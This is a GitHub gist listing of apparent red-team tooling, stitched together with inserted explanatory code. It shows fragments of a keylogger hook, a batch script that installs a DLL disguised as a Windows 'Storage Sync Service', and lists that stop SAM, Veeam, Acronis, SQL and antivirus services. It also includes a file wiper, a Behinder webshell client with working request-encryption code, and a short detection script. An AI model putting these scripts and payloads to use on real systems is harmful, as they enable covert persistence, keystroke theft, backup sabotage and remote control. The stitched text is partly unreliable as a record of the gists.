2XXE (SRA) 2XXE-SRA

@2XXE-SRA
2XXE-SRA / enum.sh
Created August 16, 2022 20:19
linux enum.sh
#!/bin/bash
# Quick host enumeration: storage, network, processes, users, services, packages.
df -aH                                            # all mounted filesystems, human-readable sizes
ip addr                                           # interfaces and assigned addresses
netstat -tulpn                                    # listening TCP/UDP sockets with owning PIDs (-p needs root); use ss -tulpn where net-tools is absent
ps aux                                            # all processes (BSD syntax; "ps -aux" only works by accident and warns on some procps builds)
who -a                                            # logged-in users, boot time, run level
systemctl list-units --type=service --no-pager    # systemd services
service --status-all                              # SysV-style service status
apt list --installed                              # Debian/Ubuntu package inventory
@2XXE-SRA
2XXE-SRA / dockerssm.py
Created August 4, 2022 19:17
Docker daemon via SSM session port forward
import json
import docker
import os
import boto3
import subprocess
TARGET_INSTANCE = "<instance ID>"   # EC2 instance running the SSM agent and the Docker daemon
LOCAL_PORT = "9999"                 # local listener opened by session-manager-plugin; the Docker client connects here
REGION = "us-east-1"
PROFILE = "default"                 # AWS CLI / boto3 profile used to start the session
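The preview above stops at the constants, so here is an added example, not the gist's own code, of the technique its title names: open an SSM port forward to the instance and point the Docker SDK at the local end. It assumes the instance's Docker daemon listens on loopback TCP 2375 (SSM forwards TCP ports only, so a daemon bound solely to the unix socket is unreachable this way), that the AWS CLI and session-manager-plugin are installed, and it drives the CLI with subprocess rather than boto3. The instance ID is hypothetical; the argv builder and its parser run without AWS access, the rest needs a real session.

```python
import json
import subprocess
import time

# Hypothetical values; only the parameter names (instance, local port, region, profile)
# come from the gist. REMOTE_PORT assumes dockerd is listening on the instance's
# loopback TCP 2375 (assumption, see lead-in).
TARGET_INSTANCE = "i-0123456789abcdef0"
LOCAL_PORT = "9999"
REMOTE_PORT = "2375"
REGION = "us-east-1"
PROFILE = "default"
DOCUMENT = "AWS-StartPortForwardingSession"


def ssm_port_forward_argv(instance_id, local_port, remote_port, region, profile):
    """argv for `aws ssm start-session` that forwards local_port on this machine to
    remote_port on the instance's own loopback. SSM document parameters are JSON
    objects whose values are arrays of strings, even for single ports."""
    params = {"portNumber": [str(remote_port)], "localPortNumber": [str(local_port)]}
    return [
        "aws", "ssm", "start-session",
        "--target", instance_id,
        "--document-name", DOCUMENT,
        "--parameters", json.dumps(params),
        "--region", region,
        "--profile", profile,
    ]


def port_forward_parameters(argv):
    """Pull (document name, parsed parameters) back out of an argv for pre-flight checks."""
    doc = argv[argv.index("--document-name") + 1]
    params = json.loads(argv[argv.index("--parameters") + 1])
    return doc, params


def docker_base_url(local_port):
    # Plain tcp://, no TLS: the SSM channel is encrypted, the daemon side is not.
    return f"tcp://127.0.0.1:{local_port}"


def main():
    # Caller needs ssm:StartSession on the instance and on the port-forwarding document.
    session = subprocess.Popen(
        ssm_port_forward_argv(TARGET_INSTANCE, LOCAL_PORT, REMOTE_PORT, REGION, PROFILE)
    )
    try:
        time.sleep(3)  # the plugin needs a moment before the local listener is up
        import docker  # imported lazily so the builders above run without the SDK installed
        client = docker.DockerClient(base_url=docker_base_url(LOCAL_PORT))
        for c in client.containers.list(all=True):
            print(c.short_id, c.name, c.status)
    finally:
        session.terminate()


if __name__ == "__main__":
    main()
```

The control side of this is worth noting: whoever can open this forward has unauthenticated control of dockerd, which is root on the instance. If you do not want every `ssm:StartSession` holder to have that, restrict the session documents a principal may use (the `ssm:SessionDocumentAccessCheck` condition key with explicit document ARNs as resources) and keep dockerd off TCP unless it has TLS client auth.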
@2XXE-SRA
2XXE-SRA / removeace.ps1
Last active June 29, 2022 19:51
Example removal of an ACE via PowerShell ADSI
# get SID for the "Everyone" principal and translate it to an NTAccount
$sid = [Security.Principal.SecurityIdentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
$everyone = $sid.Translate([Security.Principal.NTAccount])
# the ACE covers the User-Change-Password extended right, identified by its rightsGuid
$adRight = [DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
$pguid = New-Object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b" # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb
# constructor arguments for an ActiveDirectoryAccessRule: "Everyone", Allow, User-Change-Password, no inheritance;
# the rule built from these identifies the ACE to remove
$accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None"
@2XXE-SRA
2XXE-SRA / keylog.cs
Created June 14, 2022 20:22
Local Collection resources
using System;
using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
class InterceptKeys
{
    private const int WH_KEYBOARD_LL = 13;   // SetWindowsHookEx hook type: low-level keyboard hook
    private const int WM_KEYDOWN = 0x0100;   // message id the hook callback filters on
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run correctly."
REM remove any earlier instance of the service, then stage the DLL from the script's directory
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
REM stop SAM and Veeam services, issued once via net1 and once via net.exe
net1 stop samss /y
net1 stop veeamcatalogsvc /y
net1 stop veeamcloudsvc /y
net1 stop veeamdeploysvc /y
net.exe stop samss /y
net.exe stop veeamcatalogsvc /y
net.exe stop veeamcloudsvc /y
net.exe stop veeamdeploysvc /y
REM force-kill SQL Server helper processes
taskkill.exe /IM sqlbrowser.exe /F
taskkill.exe /IM sqlceip.exe /F
@2XXE-SRA
2XXE-SRA / php_cmd.py
Last active March 17, 2022 18:09
Behinder webshell clients
# Behinder Webshell Clients
## php_cmd.py
Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar.
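The README says the client needs Cmd.php from the official jar but does not show the wire format. As an added example, not the gist's php_cmd.py and not code from the Behinder project, here is a Python implementation of the request framing the public Behinder 3.x PHP shell.php accepts, written from that shell's source. Assumptions: the key is the first 16 hex characters of md5(password) (default password rebeyond); with ext/openssl the body is base64(AES-128-CBC(zero IV, PKCS#7)) as PHP's openssl_decrypt($post, "AES128", $key) expects; without it the shell base64-decodes and XORs byte i with key[(i + 1) & 15]; and the `assert|eval(base64_decode('...'))` wrapper is the client-side framing assumed here. The PHP snippet is a constructed stand-in for Cmd.php. The `cryptography` package is optional; without it only the XOR branch runs.

```python
import base64
import hashlib
import re

try:  # AES branch mirrors openssl_decrypt($post, "AES128", $key) in shell.php
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_AES = True
except ImportError:  # shell.php falls back to XOR when ext/openssl is missing
    HAVE_AES = False

ZERO_IV = b"\x00" * 16  # PHP openssl_encrypt/decrypt with no IV argument uses 16 zero bytes
# Framing assumed for the client side (see lead-in); checked against the decrypted payload.
_WRAP = re.compile(r"^assert\|eval\(base64_decode\('([A-Za-z0-9+/=]*)'\)\)$")


def behinder_key(password: str) -> bytes:
    """$key in shell.php is the first 16 hex characters of md5(password)."""
    return hashlib.md5(password.encode()).hexdigest()[:16].encode()


def xor_encode(plaintext: bytes, key: bytes) -> str:
    """No-openssl branch: byte i XORed with key[(i + 1) & 15], then base64."""
    masked = bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(plaintext))
    return base64.b64encode(masked).decode()


def xor_decode(blob: str, key: bytes) -> bytes:
    raw = base64.b64decode(blob)
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(raw))


def aes_encode(plaintext: bytes, key: bytes) -> str:
    """openssl branch: AES-128-CBC, zero IV, PKCS#7 padding, base64 output (PHP defaults)."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(ZERO_IV), backend=default_backend()).encryptor()
    return base64.b64encode(enc.update(padded) + enc.finalize()).decode()


def aes_decode(blob: str, key: bytes) -> bytes:
    dec = Cipher(algorithms.AES(key), modes.CBC(ZERO_IV), backend=default_backend()).decryptor()
    padded = dec.update(base64.b64decode(blob)) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def build_body(php_code: str, password: str, use_aes: bool = HAVE_AES) -> str:
    """Wrap PHP code in the assumed assert|eval framing and encrypt it as a POST body."""
    inner = base64.b64encode(php_code.encode()).decode()
    payload = f"assert|eval(base64_decode('{inner}'))".encode()
    key = behinder_key(password)
    return aes_encode(payload, key) if use_aes else xor_encode(payload, key)


def decode_body(body: str, password: str, use_aes: bool = HAVE_AES) -> str:
    """Inverse of build_body: recover the PHP code from a captured request body."""
    key = behinder_key(password)
    payload = (aes_decode if use_aes else xor_decode)(body, key).decode()
    m = _WRAP.match(payload)
    if not m:
        raise ValueError("body is not in the expected Behinder framing")
    return base64.b64decode(m.group(1)).decode()


if __name__ == "__main__":
    # Constructed stand-in for Cmd.php with the command filled in.
    code = "echo shell_exec('id');"
    body = build_body(code, "rebeyond")
    print(body)
    print(decode_body(body, "rebeyond"))
```

Two practical points follow from the scheme. The key is a fixed function of the password and the IV is zero, so with the password (very often the default) aes_decode/xor_decode recover both the request and, since Cmd.php encrypts its JSON reply with the same session key, the response from a packet capture. And because equal plaintexts give equal ciphertexts, repeated commands produce identical bodies, which is itself a usable network signature.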
@2XXE-SRA
2XXE-SRA / README.md
Last active February 1, 2022 19:07
File wiper (and other resources) based on DEV-0586 (MSTIC)

Usage

.\wipe <directory>

will rewrite all files in a directory recursively

net stop "Acronis VSS Provider" /y 
net stop "Enterprise Client Service" /y 
net stop "SQLsafe Backup Service" /y 
net stop "SQLsafe Filter Service" /y 
net stop "Veeam Backup Catalog Data Service" /y 
net stop AcronisAgent /y 
net stop AcrSch2Svc /y 
net stop Antivirus /y 
net stop ARSM /y 
net stop BackupExecAgentAccelerator /y 
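The service list here and the earlier batch fragment (net1/net.exe stops of samss and the Veeam services, taskkill of sqlbrowser.exe) show the same pre-encryption pattern: a burst of backup and AV service stops from one host. As an added example, not part of any of these gists, here is the detection logic written in Python and run over constructed process-creation command lines (the shape of a Sysmon Event ID 1 CommandLine; the lines are made up, not real telemetry). The exact service names come from the page; the substring list and the per-host threshold are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample (host, command line) pairs, not real captures.
SAMPLE_EVENTS = [
    ("host1", 'net1 stop samss /y'),
    ("host1", 'net.exe stop veeamcatalogsvc /y'),
    ("host1", 'sc.exe stop veeamdeploysvc'),
    ("host1", 'net stop "Acronis VSS Provider" /y'),
    ("host1", 'net stop "SQLsafe Backup Service" /y'),
    ("host1", 'taskkill.exe /IM sqlbrowser.exe /F'),
    ("host2", 'net stop spooler'),                                  # routine admin action
    ("host2", 'C:\\Windows\\System32\\net.exe stop wuauserv'),      # routine admin action
    ("host2", 'sc stop veeamcloudsvc'),                             # one hit, below threshold
]

# Exact names from the page's lists (lower-cased) plus substrings for the rest of a
# typical backup/AV watchlist (substrings are this example's assumption, tune locally).
WATCHLIST_EXACT = {
    "samss", "veeamcatalogsvc", "veeamcloudsvc", "veeamdeploysvc",
    "acronis vss provider", "enterprise client service", "sqlsafe backup service",
    "sqlsafe filter service", "veeam backup catalog data service", "acronisagent",
    "acrsch2svc", "antivirus", "arsm", "backupexecagentaccelerator",
}
WATCHLIST_SUBSTR = ("veeam", "acronis", "backup", "sqlsafe", "antivirus", "vss")
KILL_IMAGES = {"sqlbrowser.exe", "sqlceip.exe"}
STOP_TOOLS = {"net", "net1", "sc"}

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split on whitespace but keep double-quoted service names as one token."""
    return [quoted if quoted else bare for quoted, bare in _TOKEN.findall(cmdline)]


def basename(tok):
    """Strip a leading path and .exe so C:\\Windows\\System32\\net.exe and net match."""
    name = tok.rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(cmdline):
    """Return ("stop", service) or ("kill", image) for stop/kill commands, else None."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    tool = basename(toks[0])
    if tool in STOP_TOOLS and len(toks) >= 3 and toks[1].lower() == "stop":
        return ("stop", toks[2].lower())
    if tool == "taskkill":
        low = [t.lower() for t in toks]
        if "/im" in low and low.index("/im") + 1 < len(low):
            return ("kill", low[low.index("/im") + 1])
    return None


def is_backup_target(kind, target):
    if kind == "kill":
        return target in KILL_IMAGES
    return target in WATCHLIST_EXACT or any(s in target for s in WATCHLIST_SUBSTR)


def suspicious_events(events):
    """(host, kind, target) for every stop/kill aimed at a backup or AV component."""
    hits = []
    for host, cmd in events:
        c = classify(cmd)
        if c and is_backup_target(*c):
            hits.append((host, c[0], c[1]))
    return hits


def hosts_over_threshold(events, threshold=3):
    """Alert per host once it has hit >= threshold distinct targets: a single stop is
    admin noise, a burst is the pattern the scripts on this page produce."""
    per_host = defaultdict(set)
    for host, _kind, target in suspicious_events(events):
        per_host[host].add(target)
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= threshold}


if __name__ == "__main__":
    for host, targets in hosts_over_threshold(SAMPLE_EVENTS).items():
        print(host, targets)
```

In production you would key the burst on a time window as well as the host, and watch `sc delete`, `sc config ... start= disabled` and PowerShell `Stop-Service` alongside net/net1/sc, since the same scripts switch tools freely.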
@2XXE-SRA
2XXE-SRA / cmd.bat
Last active September 27, 2021 20:07
Batch script to mimic a minimal cmd window
@echo off
setlocal enabledelayedexpansion
set "true=1"
:loop
if defined true (
    REM prompt with the current directory, the way cmd.exe does, and read a line
    set /p c="%cd%> "
    REM run it through start; delayed expansion (!c!) is needed to see a value set inside this block
    start !c!
    set c=